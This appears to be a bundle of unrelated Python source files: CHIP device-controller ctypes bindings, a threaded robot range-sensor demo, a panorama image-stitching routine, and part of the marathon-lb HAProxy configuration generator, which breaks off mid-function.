self._dmLib.nl_Chip_DeviceController_DriveIO.argtypes = [c_uint32]
self._dmLib.nl_Chip_DeviceController_DriveIO.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_WakeForBleIO.argtypes = []
self._dmLib.nl_Chip_DeviceController_WakeForBleIO.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_SetBleEventCB.argtypes = [
_GetBleEventFunct
]
self._dmLib.nl_Chip_DeviceController_SetBleEventCB.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_SetBleWriteCharacteristic.argtypes = [
_WriteBleCharacteristicFunct
]
self._dmLib.nl_Chip_DeviceController_SetBleWriteCharacteristic.restype = (
c_uint32
)
self._dmLib.nl_Chip_DeviceController_SetBleSubscribeCharacteristic.argtypes = [
_SubscribeBleCharacteristicFunct
]
self._dmLib.nl_Chip_DeviceController_SetBleSubscribeCharacteristic.restype = (
c_uint32
)
self._dmLib.nl_Chip_DeviceController_SetBleClose.argtypes = [_CloseBleFunct]
self._dmLib.nl_Chip_DeviceController_SetBleClose.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_IsConnected.argtypes = [c_void_p]
self._dmLib.nl_Chip_DeviceController_IsConnected.restype = c_bool
self._dmLib.nl_Chip_DeviceController_ValidateBTP.argtypes = [
c_void_p,
c_void_p,
_CompleteFunct,
_ErrorFunct,
]
self._dmLib.nl_Chip_DeviceController_ValidateBTP.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_GetLogFilter.argtypes = []
self._dmLib.nl_Chip_DeviceController_GetLogFilter.restype = c_uint8
self._dmLib.nl_Chip_DeviceController_SetLogFilter.argtypes = [c_uint8]
self._dmLib.nl_Chip_DeviceController_SetLogFilter.restype = None
self._dmLib.nl_Chip_DeviceController_Connect.argtypes = [c_void_p, c_void_p, c_uint32, _OnConnectFunct, _OnMessageFunct, _OnRendezvousErrorFunct]
self._dmLib.nl_Chip_DeviceController_Connect.restype = c_uint32
self._dmLib.nl_Chip_ScriptDevicePairingDelegate_NewPairingDelegate.argtypes = [POINTER(c_void_p)]
self._dmLib.nl_Chip_ScriptDevicePairingDelegate_NewPairingDelegate.restype = c_uint32
self._dmLib.nl_Chip_ScriptDevicePairingDelegate_SetWifiCredential.argtypes = [c_void_p, c_char_p, c_char_p]
self._dmLib.nl_Chip_ScriptDevicePairingDelegate_SetWifiCredential.restype = c_uint32
self._dmLib.nl_Chip_DeviceController_SetDevicePairingDelegate.argtypes = [c_void_p, c_void_p]
self._dmLib.nl_Chip_DeviceController_SetDevicePairingDelegate.restype = c_uint32
|
remoteSensors.py
|
from threading import Thread
from time import sleep
class AngleSensor:
"""
Angle sensor has two main roles. It listens on the specified
port for udp angle packets and parses them to obtain the most
recent value for the angle to target. It also acts as a data
source for a PIDController.
If the target is to the left of the robot, the angle is reported
as negative.
Example:
angleSensor = AngleSensor('10.10.76.7', 8812)
This creates channel to listen on port 8812 for angle information.
"""
def __init__(self, sensor_ip, listen_port):
self.vision_ip = sensor_ip
self.angle = 0
def pidGet(self):
# return cached value that was last received from
# the vision system
#
return self.angle
class RangeSensor:
"""
RangeSensor has two main functions. The first is to listen on the specified listen_port
for range packets from forward facing sonar units. The second is to act as a datasource
for PIDController object.
Example:
rangeSensor = RangeSensor('10.10.76.9', 8813)
"""
def __init__(self, sensor_ip, listen_port):
self.sonar_ip = sensor_ip
self.range_cm = 0
self.listening = True
self.t = Thread(target = RangeSensor.receivePackets, args=(self,))
self.t.start()
def stop(self):
self.listening = False
def pidGet(self):
        # return cached value that was last received from
# the sonar unit
return self.range_cm
def receivePackets(self):
"""
        Run a continuous loop that blocks on I/O and caches the most recent
        range reading in self.range_cm until stop() clears self.listening.
"""
i = 0
while self.listening:
i += 1
pkt = do_some_blocking_io(i)
self.range_cm = contents(pkt)
def do_some_blocking_io(x):
print("Blocking operation started. Each takes 5 seconds.")
sleep(5)
print("Blocking operation ended..")
return x
def contents(p):
return p
def main():
"""
Pretend this is a robot init + loop (with 1 second period)
"""
rs = RangeSensor('10.10.76.9', 8813)
for i in range(25):
print("Range reading is {}".format(rs.pidGet()))
sleep(1)
rs.stop()
if __name__ == "__main__":
main()
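# Note: receivePackets() only re-checks self.listening between calls to
# do_some_blocking_io(), and each call sleeps for 5 seconds, so rs.stop() can
# take up to one full blocking call (roughly 5 s) before the reader thread exits.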
|
panorama.py
|
import numpy as np
import algos
import utils
import viz
import threading
def cornerDetectionAndSuppression(I, Imask, anms, cmax, out):
if not anms:
_, Ixy = algos.harris(I, maxPeaks=cmax)
out.append(Ixy)
Id = algos.makeDescriptors(I, Ixy)
out.append(Id)
else:
Ih, Ixy = algos.harris(Imask if Imask is not None else I, maxPeaks=-1)
Ixy_ = algos.anms(Ih, Ixy, cmax=cmax)
out.append(Ixy)
out.append(Ixy_)
Id = algos.makeDescriptors(I, Ixy_)
out.append(Id)
def stitch(S, T, Tpre, anms, cmax, maskpow=1., intermediates=None):
# 1. Operate on grayscale images (red channel chosen arbitrarily):
S_, T_ = S[..., 0], T[..., 0]
# 2. Corner Detection + Non-Maximal Suppression:
Tmask = np.where(Tpre != 0, T, 0)[..., 0] if anms else None
out = [[], []]
tasks = [
threading.Thread(target=cornerDetectionAndSuppression, args=(S_, None, anms, cmax, out[0])),
threading.Thread(target=cornerDetectionAndSuppression, args=(T_, Tmask, anms, cmax, out[1]))
]
[t.start() for t in tasks]
[t.join() for t in tasks]
# All detected corners + descriptors
Sxy_, Txy_ = out[0][0], out[1][0]
Sd, Td = out[0][-1], out[1][-1]
if not anms:
# Keep lower of N most prominent between S and T
hmin = min(Sxy_.shape[0], Txy_.shape[0])
Sxy, Txy = Sxy_[:hmin], Txy_[:hmin]
Sd, Td = Sd[..., :hmin], Td[..., :hmin]
else:
# ANMS already dropped some
Sxy, Txy = out[0][1], out[1][1]
print('[total corners]:\t\t\t\tS: {} | T: {}'.format(len(Sxy_), len(Txy_)))
print('[after suppression ({})]:\t\t\t\tS: {} | T: {}'.format('ANMS' if anms else 'rank+min', len(Sxy), len(Txy)))
if intermediates is not None:
# plot all corners found
S1_, T1_ = viz.plotImages(S, T, Sxy_, Txy_)
intermediates.append(S1_)
intermediates.append(T1_)
# plot corners left after suppression
S1_, T1_ = viz.plotImages(S, T, Sxy, Txy)
intermediates.append(S1_)
intermediates.append(T1_)
# 3. Match 9x9 descriptors out of detected corners:
idx = algos.matchDescriptors(Sd, Td, nnMax=0.55)
print('[matched descriptors]:\t\t{}'.format(len(idx)))
if intermediates is not None:
# plot matched descriptors:
S1_ = viz.plotDescriptors(S, Sxy[idx[:, 0], :], size=9)
T1_ = viz.plotDescriptors(T, Txy[idx[:, 1], :], size=9)
intermediates.append(S1_)
intermediates.append(T1_)
# 4. Create homography from source to target, based on the best
# set of descriptors computed via RANSAC:
H, c = algos.ransac(Sxy, Txy, idx, e=6, n=1000)
print('[RANSAC set length]:\t\t{}'.format(len(c)))
if H is None:
print('skip')
return T, T
if intermediates is not None:
# plot best matched descriptors after RANSAC:
S1_ = viz.plotDescriptors(S, Sxy[idx[c, 0], :], size=9)
T1_ = viz.plotDescriptors(T, Txy[idx[c, 1], :], size=9)
f = viz.plotMatches(S1_, T1_, Sxy[idx[c, 0], :], Txy[idx[c, 1], :])
if f:
intermediates.append(f)
else:
intermediates.append(S1_)
intermediates.append(T1_)
th, tw = T.shape[0], T.shape[1]
sh, sw = S.shape[0], S.shape[1]
# 5. Forward warp source corners onto target space to compute final composite size:
Sc_ = np.column_stack([(0, 0, 1), (sw - 1, 0, 1), (sw - 1, sh - 1, 1), (0, sh - 1, 1)])
Tc_ = H @ Sc_
Tc = (Tc_ / Tc_[-1])[:-1]
if (Tc_[:2, 0] < Sc_[:2, 0]).any():
maskRange = (0., 1.)
else:
maskRange = (1., 0.)
cmin = np.minimum(np.amin(Tc, axis=1), (0, 0))
cmax = np.maximum(np.amax(Tc, axis=1), (tw - 1, th - 1))
    csize = np.ceil((cmax - cmin) + 1).astype(int)[::-1]
    if len(T.shape) == 3:
csize = (*csize, T.shape[2])
# 6. Copy target to new size:
T_ = np.zeros(csize)
    cmin = np.abs(cmin).astype(int)
T_[cmin[1]: cmin[1] + th, cmin[0]: cmin[0] + tw] = T
# 7. Inverse warp target onto source space (accounting for offset in new target size):
i = np.meshgrid(np.arange(csize[1]), np.arange(csize[0]))
    Txy_ = np.vstack((i[0].flatten(), i[1].flatten(), np.ones(csize[0] * csize[1]))).astype(int)
cmin_ = np.row_stack((*cmin, 0))
H_ = np.linalg.inv(H)
Sxy_ = H_ @ (Txy_ - cmin_)
Sxy = (Sxy_ / Sxy_[-1])[:-1]
Txy = Txy_[:-1]
# 8. Copy source to new size (from points in source space range to target space).
S_ = np.zeros(csize)
i = ((Sxy.T >= (0, 0)) & (Sxy.T <= (sw - 1, sh - 1))).all(axis=1).nonzero()[0]
Txy = Txy[:, i]
Sxy = Sxy[:, i]
S_[Txy[1], Txy[0]] = algos.binterp(S, Sxy[0], Sxy[1])
# 9. Final composite (a quick alpha blending):
m = np.where((S_ != 0) & (T_ != 0))
mvals = np.interp(m[1], (m[1].min(), m[1].max()), maskRange) ** maskpow
C = np.where(S_ != 0, S_, T_)
C[m] = (1.-mvals)*S_[m] + mvals*T_[m]
if intermediates is not None:
S1_ = S_.copy()
T1_ = T_.copy()
S1_[m] = (1. - mvals) * S1_[m]
T1_[m] = mvals * T1_[m]
intermediates.append(S_)
intermediates.append(T_)
intermediates.append(S1_)
intermediates.append(T1_)
return C, T_
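# Illustration of the forward warp used in step 5 above (a standalone sketch,
# not a call into the algos module): a homogeneous point [x, y, 1] is mapped by
# the homography H and then de-homogenised by dividing by its last coordinate.
#
#   p = np.array([10.0, 20.0, 1.0])
#   q_ = H @ p
#   q = q_[:2] / q_[2]      # pixel coordinates of p in the target image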
def testPanorama(example, outprefix, anms, cmax, intermediates=False):
if example == 1:
# example 1: living room
outpath = './data/panorama/livingroom/processed/'
paths = [
'./data/panorama/livingroom/lr-l.jpg',
'./data/panorama/livingroom/lr-c.jpg',
'./data/panorama/livingroom/lr-r.jpg'
]
else:
# example 2: balcony
outpath = './data/panorama/balcony/processed/'
paths = [
'./data/panorama/balcony/IMG_4189.jpg',
'./data/panorama/balcony/IMG_4190.jpg',
'./data/panorama/balcony/IMG_4191.jpg',
'./data/panorama/balcony/IMG_4188.jpg',
'./data/panorama/balcony/IMG_4192.jpg',
'./data/panorama/balcony/IMG_4187.jpg',
'./data/panorama/balcony/IMG_4193.jpg',
'./data/panorama/balcony/IMG_4186.jpg',
'./data/panorama/balcony/IMG_4194.jpg',
'./data/panorama/balcony/IMG_4185.jpg',
'./data/panorama/balcony/IMG_4195.jpg'
]
imgs = []
    np.random.seed(12)
S, T = paths[:2]
with utils.Profiler():
print(paths[0], paths[1])
try:
S, T = utils.Image.load(S, T, float=True)
with utils.Profiler():
T, T_ = stitch(S, T, T, anms, cmax, maskpow=.2, intermediates=imgs if intermediates else None)
imgs.append(T)
except Exception as e:
print(e)
print('error processing: ', paths[0], paths[1], ' skip')
for path in paths[2:]:
print(path)
try:
S = utils.Image.load(path, float=True)
with utils.Profiler():
T, T_ = stitch(S, T, T_, anms, cmax, maskpow=6., intermediates=imgs if intermediates else None)
imgs.append(T)
except Exception as e:
print(e)
print('error processing: ', path, ' skip.')
print('done')
print('saving images...')
if not intermediates:
imgs = imgs[-1:]
for i, img in enumerate(imgs):
if type(img) is np.ndarray:
utils.Image.save((
img, outpath + outprefix + str(i) + '.jpg'
))
else:
img.savefig(
outpath + outprefix + str(i) + '.svg',
dpi=1200, transparent=True, bbox_inches = 'tight', pad_inches=0
)
print(i+1, ' saved...')
# testPanorama(1, 'livingroom-', anms=False, cmax=300, intermediates=False)
# testPanorama(1, 'anms/livingroom-anms-', anms=True, cmax=300, intermediates=False)
# testPanorama(2, 'balcony-', anms=False, cmax=300)
# testPanorama(2, 'balcony-anms-', anms=True, cmax=300)
|
marathon_lb.py
|
#!/usr/bin/env python3
"""# marathon-lb
### Overview
The marathon-lb is a service discovery and load balancing tool
for Marathon based on HAProxy. It reads the Marathon task information
and dynamically generates HAProxy configuration details.
To gather the task information, marathon-lb needs to know where
to find Marathon. The service configuration details are stored in labels.
Every service port in Marathon can be configured independently.
### Configuration
Service configuration lives in Marathon via labels.
Marathon-lb just needs to know where to find Marathon.
### Command Line Usage
"""
import argparse
import hashlib
import json
import logging
import os
import os.path
import random
import re
import shlex
import signal
import stat
import subprocess
import sys
import threading
import time
import datetime
import urllib.parse
from itertools import cycle
from collections import defaultdict
from operator import attrgetter
from shutil import move, copy
from tempfile import mkstemp
import dateutil.parser
import requests
import pycurl
import urllib3.exceptions
from common import (get_marathon_auth_params, set_logging_args,
set_marathon_auth_args, setup_logging, cleanup_json)
from config import ConfigTemplater, label_keys
from lrucache import LRUCache
from utils import (CurlHttpEventStream, get_task_ip_and_ports, ip_cache,
ServicePortAssigner)
logger = logging.getLogger('marathon_lb')
SERVICE_PORT_ASSIGNER = ServicePortAssigner()
class MarathonBackend(object):
def __init__(self, host, ip, port, draining):
self.host = host
"""
The host that is running this task.
"""
self.ip = ip
"""
The IP address used to access the task. For tasks using IP-per-task,
this is the actual IP address of the task; otherwise, it is the IP
address resolved from the hostname.
"""
self.port = port
"""
The port used to access a particular service on a task. For tasks
using IP-per-task, this is the actual port exposed by the task;
otherwise, it is the port exposed on the host.
"""
self.draining = draining
"""
Whether we should be draining access to this task in the LB.
"""
def __hash__(self):
return hash((self.host, self.port))
def __repr__(self):
return "MarathonBackend(%r, %r, %r)" % (self.host, self.ip, self.port)
class MarathonService(object):
def __init__(self, appId, servicePort, healthCheck, strictMode):
self.appId = appId
self.servicePort = servicePort
self.backends = set()
self.hostname = None
self.proxypath = None
self.revproxypath = None
self.redirpath = None
self.haproxy_groups = frozenset()
self.path = None
self.authRealm = None
self.authUser = None
self.authPasswd = None
self.sticky = False
self.enabled = not strictMode
self.redirectHttpToHttps = False
self.useHsts = False
self.sslCert = None
self.bindOptions = None
self.bindAddr = '*'
self.groups = frozenset()
self.mode = None
self.balance = 'roundrobin'
self.healthCheck = healthCheck
self.labels = {}
self.backend_weight = 0
self.network_allowed = None
self.healthcheck_port_index = None
if healthCheck:
if healthCheck['protocol'] == 'HTTP':
self.mode = 'http'
def add_backend(self, host, ip, port, draining):
self.backends.add(MarathonBackend(host, ip, port, draining))
def __hash__(self):
return hash(self.servicePort)
def __eq__(self, other):
return self.servicePort == other.servicePort
def __repr__(self):
return "MarathonService(%r, %r)" % (self.appId, self.servicePort)
class MarathonApp(object):
def __init__(self, marathon, appId, app):
self.app = app
self.groups = frozenset()
self.appId = appId
# port -> MarathonService
self.services = dict()
def __hash__(self):
return hash(self.appId)
def __eq__(self, other):
return self.appId == other.appId
class Marathon(object):
class AllHostsTimeout(Exception):
pass
def __init__(self, hosts, health_check, strict_mode, auth, ca_cert=None):
# TODO(cmaloney): Support getting master list from zookeeper
self.__hosts = hosts
self.__health_check = health_check
self.__strict_mode = strict_mode
self.__auth = auth
self.__cycle_hosts = cycle(self.__hosts)
self.__verify = False
self.current_host = None
if ca_cert:
self.__verify = ca_cert
logger.info('Initializing Marathon connection via hosts: %s',
self.__hosts)
def api_req_raw(self, method, path, auth, body=None, **kwargs):
for i, host in enumerate(self.__hosts):
path_str = os.path.join(host, 'v2', *path)
logger.info('Calling %s %s.', method, path_str)
try:
response = requests.request(
method,
path_str,
auth=auth,
headers={
'Accept': 'application/json',
'Content-Type': 'application/json'
},
timeout=(3.05, 46),
**kwargs
)
logger.debug("%s %s", method, response.url)
if response.ok and i != 0:
# stick to the host with the last successful requests
self.__hosts = self.__hosts[i:] + self.__hosts[:i]
resp_json = cleanup_json(response.json())
if 'message' in resp_json:
response.reason = "%s (%s)" % (
response.reason,
resp_json['message'])
return response
except (requests.exceptions.Timeout,
urllib3.exceptions.TimeoutError,
urllib3.exceptions.MaxRetryError,
IOError):
logger.info('Error calling %s %s, trying next host.',
method, path_str)
logger.debug("%s %s", method, path_str, exc_info=True)
raise self.AllHostsTimeout()
def api_req(self, method, path, **kwargs):
data = self.api_req_raw(method, path, self.__auth,
verify=self.__verify, **kwargs).json()
return cleanup_json(data)
def create(self, app_json):
return self.api_req('POST', ['apps'], app_json)
def get_app(self, appid):
logger.info('fetching app %s', appid)
return self.api_req('GET', ['apps', appid])["app"]
# Lists all running apps.
def list(self):
logger.info('fetching apps')
return self.api_req('GET', ['apps'],
params={'embed': 'apps.tasks'})["apps"]
def health_check(self):
return self.__health_check
def strict_mode(self):
return self.__strict_mode
def tasks(self):
logger.info('fetching tasks')
return self.api_req('GET', ['tasks'])["tasks"]
def get_event_stream(self, events):
self.current_host = self.host
url = self.host + "/v2/events"
if events:
url += "?" + urllib.parse.urlencode({'event_type': events},
doseq=True)
return CurlHttpEventStream(url, self.__auth, self.__verify)
def iter_events(self, stream):
logger.info(
"SSE Active, trying fetch events from {0}".format(stream.url))
class Event(object):
def __init__(self, data):
self.data = data
for line in stream.iter_lines():
if line.strip() != '':
for real_event_data in re.split(r'\r\n',
line.decode('utf-8')):
if real_event_data[:6] == "data: ":
event = Event(data=real_event_data[6:])
yield event
@property
def host(self):
return next(self.__cycle_hosts)
def has_group(groups, app_groups):
# All groups / wildcard match
if '*' in groups:
return True
# empty group only
if len(groups) == 0 and len(app_groups) == 0:
raise Exception("No groups specified")
# Contains matching groups
if (len(frozenset(app_groups) & groups)):
return True
return False
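# For example: has_group(frozenset(['*']), ['internal']) is True,
# has_group(frozenset(['external']), ['external', 'internal']) is True, and
# has_group(frozenset(['external']), ['internal']) is False.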
def get_backend_port(apps, app, idx):
"""
Return the port of the idx-th backend of the app which index in apps
is defined by app.healthcheck_port_index.
Example case:
We define an app mapping two ports: 9000 and 9001, that we
scaled to 3 instances.
The port 9000 is used for the app itself, and the port 9001
is used for the app healthchecks. Hence, we have 2 apps
at the marathon level, each with 3 backends (one for each
container).
If app.healthcheck_port_index is set to 1 (via the
HAPROXY_0_BACKEND_HEALTHCHECK_PORT_INDEX label), then
get_backend_port(apps, app, 3) will return the port of the 3rd
backend of the second app.
See https://github.com/mesosphere/marathon-lb/issues/198 for the
actual use case.
    Note: if app.healthcheck_port_index has an out-of-bounds value,
then the app idx-th backend is returned instead.
"""
def get_backends(app):
key_func = attrgetter('host', 'port')
return sorted(list(app.backends), key=key_func)
apps = [_app for _app in apps if _app.appId == app.appId]
# If no healthcheck port index is defined, or if its value is nonsense
# simply return the app port
if app.healthcheck_port_index is None \
or abs(app.healthcheck_port_index) > len(apps):
return get_backends(app)[idx].port
# If a healthcheck port index is defined, fetch the app corresponding
# to the argument app healthcheck port index,
# and return its idx-th backend port
apps = sorted(apps, key=attrgetter('appId', 'servicePort'))
backends = get_backends(apps[app.healthcheck_port_index])
return backends[idx].port
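# Illustrative call (hypothetical objects): with app.healthcheck_port_index set
# to 1 and two MarathonService entries sharing app.appId, the port returned for
# the idx-th backend comes from the second entry (after sorting by servicePort):
#
#   port = get_backend_port(all_apps, app, idx)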
def _get_health_check_options(template, health_check, health_check_port):
return template.format(
healthCheck=health_check,
healthCheckPortIndex=health_check.get('portIndex'),
healthCheckPort=health_check_port,
healthCheckProtocol=health_check['protocol'],
healthCheckPath=health_check.get('path', '/'),
healthCheckTimeoutSeconds=health_check['timeoutSeconds'],
healthCheckIntervalSeconds=health_check['intervalSeconds'],
healthCheckGracePeriodSeconds=health_check['gracePeriodSeconds'],
healthCheckMaxConsecutiveFailures=health_check[
'maxConsecutiveFailures'],
healthCheckFalls=health_check['maxConsecutiveFailures'] + 1,
healthCheckPortOptions=' port ' + str(
health_check_port) if health_check_port else ''
)
def mergeVhostTable(left, right):
result = left.copy()
for key in right:
if key in result:
result[key][0].extend(right[key][0])
result[key][1].update(right[key][1])
result[key][2].update(right[key][2])
else:
result[key] = right[key]
return result
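# For example (illustrative values): merging
#   {'a.example.com': ([(1, 'fe1')], {'crt1'}, set())}
# with
#   {'a.example.com': ([(2, 'fe2')], {'crt2'}, {'opt'})}
# yields
#   {'a.example.com': ([(1, 'fe1'), (2, 'fe2')], {'crt1', 'crt2'}, {'opt'})}.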
def calculate_server_id(server_name, taken_server_ids):
"""Calculate a stable server id given server name
Calculates stable server id [1] for the given server name [2]
which has following properties:
* is unique/has not been assigned yet
* is an integer from the range 1-32767
    * is stable - i.e. calling this function repeatedly with the same
server name must yield the same server id.
THE STABILITY OF SERVER_ID IS GUARANTEED IF THE ORDER OF CALLS OF THIS
FUNCTION IS PRESERVED, I.E. THE BACKEND LIST IS SORTED BEFORE
PROCESSING
[1] http://cbonte.github.io/haproxy-dconv/1.8/configuration.html#5.2-id
[2] http://cbonte.github.io/haproxy-dconv/1.8/configuration.html#5.2
Args:
server_name(str): the name of the given backend server
        taken_server_ids(set): set of already assigned server ids
Returns:
An integer depicting the server ID
"""
if server_name == '' or server_name is None:
raise ValueError("Malformed server name: {}".format(server_name))
server_name_encoded = server_name.encode('utf-8')
server_name_shasum = hashlib.sha256(server_name_encoded).hexdigest()
# The number 32767 is not coincidental. It is very important to notice
# in [1] that:
# * due to the use of atol() call [2], server id must not exceed the length
# of 'long int' on a given platform. According to [3] it is at
# least 32bits long so 32bits is a safe limit.
# * the atol() call returns `long int` which is assigned to puid var which
    # in turn is `int`. As per [4]:
#
# ```
# On a system where long is wider than int, if the value won't fit in an
# int, then the result of the conversion is implementation-defined. (Or,
# starting in C99, it can raise an implementation-defined signal, but I
# don't know of any compilers that actually do that.) What typically
# happens is that the high-order bits are discarded, but you shouldn't
# depend on that. (The rules are different for unsigned types; the result
# of converting a signed or unsigned integer to an unsigned type is well
# defined.)
# ```
#
# So we need to assume that server id is 16 bit signed integer. Server id
# must be a positive number so this gives us at most 2**15-1 = 32767
# possible server IDs. Beyond that there are dragons and the undefined
# behaviour of the C compiler ;)
#
# [1] https://github.com/haproxy/haproxy/blob/c55b88ece616afe0b28dc81eb39bad37b5f9c33f/src/server.c#L359-L388 # noqa: E501
# [2] https://github.com/haproxy/haproxy/blob/c55b88ece616afe0b28dc81eb39bad37b5f9c33f/src/server.c#L368 # noqa: E501
# [3] https://en.wikipedia.org/wiki/C_data_types
# [4] https://stackoverflow.com/a/13652624
server_id = int(server_name_shasum, 16) % 32767
if server_id not in taken_server_ids and server_id > 0:
taken_server_ids.add(server_id)
return server_id
    # We try to resolve collisions by recursively calling
    # calculate_server_id() with the server name argument set to the initial
    # server name plus the calculated `server_name_shasum` appended to it.
    # This way we should get stable IDs during the next haproxy
    # reconfiguration. The more backends there are, the more likely
    # collisions become. Initially the probability is 1/(2**15-1) * 100 =
    # 0.003%. As the new_server_id gets longer, the SHA sum calculation gets
    # more CPU-heavy and the number of SHA sum calculations per backend
    # server increases. Still, it is unlikely that we will ever reach a
    # number of backend servers that makes this approach a problem - that
    # would require backend counts in the order of thousands.
new_server_name = "{0} {1}".format(server_name, server_name_shasum)
if server_id == 0:
msg_fmt = ("server id == 0 for `%s`, retrying with `%s`")
logger.info(msg_fmt, server_name, new_server_name)
else:
msg_fmt = ("server id collision for `%s`: `%d` was already assigned, "
"retrying with `%s`")
logger.info(msg_fmt, server_name, server_id, new_server_name)
return calculate_server_id(new_server_name, taken_server_ids)
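# Illustrative usage (the concrete ids depend on the SHA-256 hash, so no values
# are shown): ids are stable across reconfigurations as long as the call order
# over the sorted backend list is preserved.
#
#   taken = set()
#   id_a = calculate_server_id('10_0_0_1_31000', taken)
#   id_b = calculate_server_id('10_0_0_2_31000', taken)
#   assert id_a == calculate_server_id('10_0_0_1_31000', set())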
def config(apps, groups, bind_http_https, ssl_certs, templater,
haproxy_map=False, domain_map_array=[], app_map_array=[],
config_file="/etc/haproxy/haproxy.cfg",
group_https_by_vhosts=False):
logger.info("generating config")
config = templater.haproxy_head
groups = frozenset(groups)
duplicate_map = {}
    # Do not emit the same backend multiple times, since the map file is the same.
_ssl_certs = ssl_certs or "/etc/ssl/cert.pem"
_ssl_certs = _ssl_certs.split(",")
if bind_http_https:
http_frontends = templater.haproxy_http_frontend_head
if group_https_by_vhosts:
https_frontends = templater.haproxy_https_grouped_frontend_head
else:
https_frontends = templater.haproxy_https_frontend_head.format(
sslCerts=" ".join(map(lambda cert: "crt " + cert, _ssl_certs))
)
# This should handle situations where customers have a custom HAPROXY_HEAD
# that includes the 'daemon' flag or does not expose listener fds:
if 'daemon' in config.split() or "expose-fd listeners" not in config:
upgrade_warning = '''\
Error in custom HAPROXY_HEAD template: \
In Marathon-LB 1.12, the default HAPROXY_HEAD section changed, please \
make the following changes to your custom template: Remove "daemon", \
Add "stats socket /var/run/haproxy/socket expose-fd listeners". \
More information can be found here: \
https://docs.mesosphere.com/services/marathon-lb/advanced/#global-template.\
'''
raise Exception(upgrade_warning)
userlists = str()
frontends = str()
backends = str()
http_appid_frontends = templater.haproxy_http_frontend_appid_head
apps_with_http_appid_backend = []
http_frontend_list = []
https_frontend_list = []
https_grouped_frontend_list = defaultdict(lambda: ([], set(), set()))
haproxy_dir = os.path.dirname(config_file)
logger.debug("HAProxy dir is %s", haproxy_dir)
for app in sorted(apps, key=attrgetter('appId', 'servicePort')):
        # App only applies if we have its group
        # Check if there is a haproxy group associated with service group;
        # if not, fall back to the original HAPROXY group.
        # This is added for backward compatibility with HAPROXY_GROUP
if app.haproxy_groups:
if not has_group(groups, app.haproxy_groups):
continue
else:
if not has_group(groups, app.groups):
continue
# Skip if it's not actually enabled
if not app.enabled:
continue
logger.debug("configuring app %s", app.appId)
if len(app.backends) < 1:
logger.error("skipping app %s as it is not valid to generate" +
" backend without any server entries!", app.appId)
continue
backend = app.appId[1:].replace('/', '_') + '_' + str(app.servicePort)
logger.debug("frontend at %s:%d with backend %s",
app.bindAddr, app.servicePort, backend)
# If app has HAPROXY_{n}_MODE set, use that setting.
# Otherwise use 'http' if HAPROXY_{N}_VHOST is set, and 'tcp' if not.
if app.mode is None:
if app.hostname:
app.mode = 'http'
else:
app.mode = 'tcp'
if app.authUser:
userlist_head = templater.haproxy_userlist_head(app)
userlists += userlist_head.format(
backend=backend,
user=app.authUser,
passwd=app.authPasswd
)
frontend_head = templater.haproxy_frontend_head(app)
frontends += frontend_head.format(
bindAddr=app.bindAddr,
backend=backend,
servicePort=app.servicePort,
mode=app.mode,
sslCert=' ssl crt ' + app.sslCert if app.sslCert else '',
bindOptions=' ' + app.bindOptions if app.bindOptions else ''
)
backend_head = templater.haproxy_backend_head(app)
backends += backend_head.format(
backend=backend,
balance=app.balance,
mode=app.mode
)
# if a hostname is set we add the app to the vhost section
# of our haproxy config
# TODO(lloesche): Check if the hostname is already defined by another
# service
if bind_http_https and app.hostname:
backend_weight, p_fe, s_fe, g_fe = \
generateHttpVhostAcl(templater,
app,
backend,
haproxy_map,
domain_map_array,
haproxy_dir,
duplicate_map)
http_frontend_list.append((backend_weight, p_fe))
https_frontend_list.append((backend_weight, s_fe))
if group_https_by_vhosts:
https_grouped_frontend_list = mergeVhostTable(
https_grouped_frontend_list, g_fe)
# if app mode is http, we add the app to the second http frontend
# selecting apps by http header X-Marathon-App-Id
if app.mode == 'http' and \
app.appId not in apps_with_http_appid_backend:
logger.debug("adding virtual host for app with id %s", app.appId)
# remember appids to prevent multiple entries for the same app
apps_with_http_appid_backend += [app.appId]
cleanedUpAppId = re.sub(r'[^a-zA-Z0-9\-]', '_', app.appId)
if haproxy_map:
if 'map_http_frontend_appid_acl' not in duplicate_map:
http_appid_frontend_acl = templater \
.haproxy_map_http_frontend_appid_acl(app)
http_appid_frontends += http_appid_frontend_acl.format(
haproxy_dir=haproxy_dir
)
duplicate_map['map_http_frontend_appid_acl'] = 1
map_element = {}
map_element[app.appId] = backend
if map_element not in app_map_array:
app_map_array.append(map_element)
else:
http_appid_frontend_acl = templater \
.haproxy_http_frontend_appid_acl(app)
http_appid_frontends += http_appid_frontend_acl.format(
cleanedUpAppId=cleanedUpAppId,
hostname=app.hostname,
appId=app.appId,
backend=backend
)
if app.mode == 'http':
if app.useHsts:
backends += templater.haproxy_backend_hsts_options(app)
backends += templater.haproxy_backend_http_options(app)
backend_http_backend_proxypass = templater \
.haproxy_http_backend_proxypass_glue(app)
if app.proxypath:
backends += backend_http_backend_proxypass.format(
hostname=app.hostname,
proxypath=app.proxypath
)
backend_http_backend_revproxy = templater \
.haproxy_http_backend_revproxy_glue(app)
if app.revproxypath:
backends += backend_http_backend_revproxy.format(
hostname=app.hostname,
rootpath=app.revproxypath
)
backend_http_backend_redir = templater \
.haproxy_http_backend_redir(app)
if app.redirpath:
backends += backend_http_backend_redir.format(
hostname=app.hostname,
redirpath=app.redirpath
)
# Set network allowed ACLs
if app.mode == 'http' and app.network_allowed:
for network in app.network_allowed.split():
backends += templater.\
haproxy_http_backend_network_allowed_acl(app).\
format(network_allowed=network)
backends += templater.haproxy_http_backend_acl_allow_deny
elif app.mode == 'tcp' and app.network_allowed:
for network in app.network_allowed.split():
backends += templater.\
haproxy_tcp_backend_network_allowed_acl(app).\
format(network_allowed=network)
backends += templater.haproxy_tcp_backend_acl_allow_deny
if app.sticky:
logger.debug("turning on sticky sessions")
backends += templater.haproxy_backend_sticky_options(app)
frontend_backend_glue = templater.haproxy_frontend_backend_glue(app)
frontends += frontend_backend_glue.format(backend=backend)
do_backend_healthcheck_options_once = True
key_func = attrgetter('host', 'port')
taken_server_ids = set()
for backend_service_idx, backendServer\
in enumerate(sorted(app.backends, key=key_func)):
if do_backend_healthcheck_options_once:
if app.healthCheck:
template_backend_health_check = None
if app.mode == 'tcp' \
or app.healthCheck['protocol'] == 'TCP' \
or app.healthCheck['protocol'] == 'MESOS_TCP':
template_backend_health_check = templater \
.haproxy_backend_tcp_healthcheck_options(app)
elif app.mode == 'http':
template_backend_health_check = templater \
.haproxy_backend_http_healthcheck_options(app)
if template_backend_health_check:
